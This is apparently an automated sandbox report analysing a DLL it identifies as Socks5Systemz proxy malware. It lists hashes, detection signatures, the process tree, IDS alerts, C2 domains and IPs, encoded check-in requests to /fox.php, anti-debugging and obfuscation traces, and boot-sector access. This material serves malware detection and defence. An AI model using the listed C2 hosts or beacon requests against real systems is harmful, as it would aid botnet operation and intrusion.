Edit tour

Windows Analysis Report
cNF6fXdjPw.dll

Overview

General Information

Sample name:	cNF6fXdjPw.dll renamed because original name is a hash value
Original sample name:	76436512E3E3A9DCA38F5EAF312FE323.dll
Analysis ID:	1575251
MD5:	76436512e3e3a9dca38f5eaf312fe323
SHA1:	503af6ad7617f847abbe509a907944f0e9213505
SHA256:	7d4ea4e69143df3f0f8fb9e4dee13c5251c4b1810d6b3a8626195906f00c0a49
Tags:	dllSocks5Systemzuser-abuse_ch
Infos:

Detection

Socks5Systemz

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Socks5Systemz

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to infect the boot sector

Machine Learning detection for sample

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query network adapater information

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7584 cmdline: loaddll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7636 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 7652 cmdline: rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

WerFault.exe (PID: 7736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["gjeqiox.com"]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
cNF6fXdjPw.dll	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
Process Memory Space: loaddll32.exe PID: 7584	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.loaddll32.exe.6ceb0000.0.unpack	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security

Suricata Signatures

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T00:48:27.168072+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49759	94.232.249.187	80	TCP
2024-12-15T00:48:40.305084+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49787	94.232.249.187	80	TCP
2024-12-15T00:48:53.445782+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49817	94.232.249.187	80	TCP
2024-12-15T00:49:12.194727+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:49:16.187683+0100	2049467	1	A Network Trojan was detected	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:50:17.587473+0100	2049467	1	A Network Trojan was detected	192.168.2.4	50013	185.237.206.129	80	TCP

ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T00:48:27.168072+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49759	94.232.249.187	80	TCP
2024-12-15T00:48:40.305084+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49787	94.232.249.187	80	TCP
2024-12-15T00:48:53.445782+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49817	94.232.249.187	80	TCP
2024-12-15T00:49:12.194727+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:49:16.187683+0100	2049468	1	A Network Trojan was detected	192.168.2.4	49874	185.237.206.129	80	TCP
2024-12-15T00:50:17.587473+0100	2049468	1	A Network Trojan was detected	192.168.2.4	50013	185.237.206.129	80	TCP

ETPRO MALWARE W32/Teamspy Variant Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-15T00:48:40.305084+0100	2829008	1	Malware Command and Control Activity Detected	192.168.2.4	49787	94.232.249.187	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: cNF6fXdjPw.dll

Avira: detected

Found malware configuration

Source: loaddll32.exe.7584.0.memstrmin

Malware Configuration Extractor: Socks5Systemz {"C2 list": ["gjeqiox.com"]}

Multi AV Scanner detection for submitted file

Source: cNF6fXdjPw.dll

ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: cNF6fXdjPw.dll

Joe Sandbox ML: detected

Source: cNF6fXdjPw.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: cNF6fXdjPw.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49759 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49759 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49787 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49787 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2829008 - Severity 1 - ETPRO MALWARE W32/Teamspy Variant Checkin : 192.168.2.4:49787 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49874 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49874 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49817 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49817 -> 94.232.249.187:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50013 -> 185.237.206.129:80
Source: Network traffic	Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50013 -> 185.237.206.129:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: gjeqiox.com

Source: global traffic

TCP traffic: 192.168.2.4:49878 -> 45.155.250.225:1074

Source: Joe Sandbox View

IP Address: 94.232.249.187 94.232.249.187

Source: Joe Sandbox View	ASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
Source: Joe Sandbox View	ASN Name: ITLDC-NLUA ITLDC-NLUA

Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.250.225
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.250.225
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.250.225
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.250.225
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.250.225
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.250.225
Source: unknown	UDP traffic detected without corresponding DNS query: 45.155.250.90
Source: unknown	UDP traffic detected without corresponding DNS query: 81.31.197.8
Source: unknown	UDP traffic detected without corresponding DNS query: 81.31.197.8
Source: unknown	UDP traffic detected without corresponding DNS query: 81.31.197.8
Source: unknown	UDP traffic detected without corresponding DNS query: 81.31.197.8
Source: unknown	UDP traffic detected without corresponding DNS query: 81.31.197.8
Source: unknown	UDP traffic detected without corresponding DNS query: 45.155.250.90

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CEB3EDF InterlockedIncrement,WSARecv,WSAGetLastError,

0_2_6CEB3EDF

Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: eeikzox.uaUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic	HTTP traffic detected: GET /fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4 HTTP/1.1Host: gjeqiox.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)

Source: global traffic	DNS traffic detected: DNS query: eeikzox.ua
Source: global traffic	DNS traffic detected: DNS query: gjeqiox.com

Source: loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/
Source: loaddll32.exe, 00000000.00000002.3600686711.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353
Source: loaddll32.exe, 00000000.00000002.3600686711.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353
Source: loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://94.232.249.187/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CEC8003: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,

0_2_6CEC8003

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEB68FD	0_2_6CEB68FD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED0C52	0_2_6CED0C52
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED6C29	0_2_6CED6C29
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD	0_2_6CEFBDBD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED7D9F	0_2_6CED7D9F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED2E0A	0_2_6CED2E0A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEDAE02	0_2_6CEDAE02
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEDA890	0_2_6CEDA890
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEDD9E0	0_2_6CEDD9E0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED796A	0_2_6CED796A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED3BCA	0_2_6CED3BCA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEDC5D3	0_2_6CEDC5D3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CECF538	0_2_6CECF538
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED7535	0_2_6CED7535
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEC775F	0_2_6CEC775F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CED711D	0_2_6CED711D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEDD3E9	0_2_6CEDD3E9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEDB374	0_2_6CEDB374

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6CEDD8F0 appears 46 times
Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6CED12F0 appears 37 times

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892

Source: cNF6fXdjPw.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal96.troj.evad.winDLL@7/8@7/3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CEC90D8 FormatMessageA,GetLastError,

0_2_6CEC90D8

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\6335e12e-6eec-4970-8883-474590d3496d

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1

Source: cNF6fXdjPw.dll

ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 892
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: cNF6fXdjPw.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: cNF6fXdjPw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: cNF6fXdjPw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: cNF6fXdjPw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: cNF6fXdjPw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: cNF6fXdjPw.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6CEC8107 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,

0_2_6CEC8107

Source: cNF6fXdjPw.dll

Static PE information: real checksum: 0xb24e5 should be: 0xb24e0

Source: cNF6fXdjPw.dll

Static PE information: section name: .vlizer

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF0A5B0 push ecx; mov dword ptr [esp], ebx	0_2_6CF0A5BC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF0A5B0 push edx; mov dword ptr [esp], esi	0_2_6CF0A5DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF0A5B0 push ecx; mov dword ptr [esp], 25F31F85h	0_2_6CF5803E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF0A5B0 push 20DA6B82h; mov dword ptr [esp], esi	0_2_6CF5809E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF0A5B0 push 18607D66h; mov dword ptr [esp], ecx	0_2_6CF580C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF02CB4 push eax; mov dword ptr [esp], ebx	0_2_6CF02CCF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF59CB8 push edi; mov dword ptr [esp], 0F7F8545h	0_2_6CF59D14
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF59CB8 push ebx; mov dword ptr [esp], 1AFAE18Fh	0_2_6CF59D35
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF3FC4C push edx; mov dword ptr [esp], 40000000h	0_2_6CF3FC6D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF3FC4C push ebp; mov dword ptr [esp], ecx	0_2_6CF3FC7B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF3FC4C push 6E3A80FFh; mov dword ptr [esp], ebx	0_2_6CF3FC92
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF02C33 push 364FDF85h; mov dword ptr [esp], ebx	0_2_6CF02C38
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF02C33 push ebp; mov dword ptr [esp], 138372B4h	0_2_6CF02C54
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF02C33 push 57E07055h; mov dword ptr [esp], ecx	0_2_6CF02C70
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD push 006B061Dh; mov dword ptr [esp], esi	0_2_6CEFBDC2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD push 7789C0A6h; mov dword ptr [esp], ebx	0_2_6CEFBDE4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD push 38D8E0CEh; mov dword ptr [esp], ecx	0_2_6CEFBE15
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD push ebx; mov dword ptr [esp], 51D38DFFh	0_2_6CEFBE31
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD push 3979AE49h; mov dword ptr [esp], eax	0_2_6CEFBE4E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD push esi; mov dword ptr [esp], ecx	0_2_6CEFBE60
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CEFBDBD push esi; mov dword ptr [esp], 1F43E62Ah	0_2_6CF32A5E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF04D91 push ecx; mov dword ptr [esp], 702DDE1Bh	0_2_6CF5C07A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF04D91 push 0EF84AA9h; mov dword ptr [esp], edx	0_2_6CF5C0BD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF04D91 push 592BBC36h; mov dword ptr [esp], ebp	0_2_6CF5C14F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF0AEF0 push esi; mov dword ptr [esp], ebp	0_2_6CF58E51
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF0AEF0 push ecx; mov dword ptr [esp], edi	0_2_6CF58F33
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF59EBC push ebp; mov dword ptr [esp], esi	0_2_6CF59F1D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF04E44 push 61B61919h; mov dword ptr [esp], eax	0_2_6CF04E8F
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF04E44 push ecx; mov dword ptr [esp], eax	0_2_6CF04EA7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF02FE4 push 692763DEh; mov dword ptr [esp], edi	0_2_6CF03018
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6CF02FE4 push esi; mov dword ptr [esp], ecx	0_2_6CF03058

Source: cNF6fXdjPw.dll

Static PE information: section name: .vlizer entropy: 7.949279852498222

Persistence and Installation Behavior

Contains functionality to infect the boot sector

Source: C:\Windows\System32\loaddll32.exe

Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0

0_2_6CEC8003

Boot Survival

Contains functionality to infect the boot sector

Source: C:\Windows\System32\loaddll32.exe

Code function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive0

0_2_6CEC8003

Source: C:\Windows\System32\loaddll32.exe

